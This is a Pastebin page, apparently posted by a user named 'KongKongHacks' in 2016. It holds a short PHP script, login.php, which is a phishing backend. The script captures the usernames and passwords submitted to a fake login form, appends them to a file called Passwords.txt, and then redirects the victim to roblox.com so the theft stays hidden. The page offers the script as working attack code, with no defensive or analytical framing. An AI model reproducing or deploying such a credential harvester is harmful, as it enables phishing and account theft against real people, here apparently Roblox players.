Advertisement
KongKongHacks

login.php

Feb 22nd, 2016
181
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.30 KB | None | 0 0
  1. <?php
  2. header ('Location: http://www.roblox.com/ ');
  3. $username = $_POST['username'];
  4. $password = $_POST['password'];
  5.  
  6. $File = "Passwords.txt";
  7. $fhandle = fopen($File, 'a');
  8.  
  9. fwrite($fhandle,$username);
  10. fwrite($fhandle,":");
  11. fwrite($fhandle,$password);
  12. fwrite($fhandle, "\n");
  13. fclose($fhandle);
  14. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement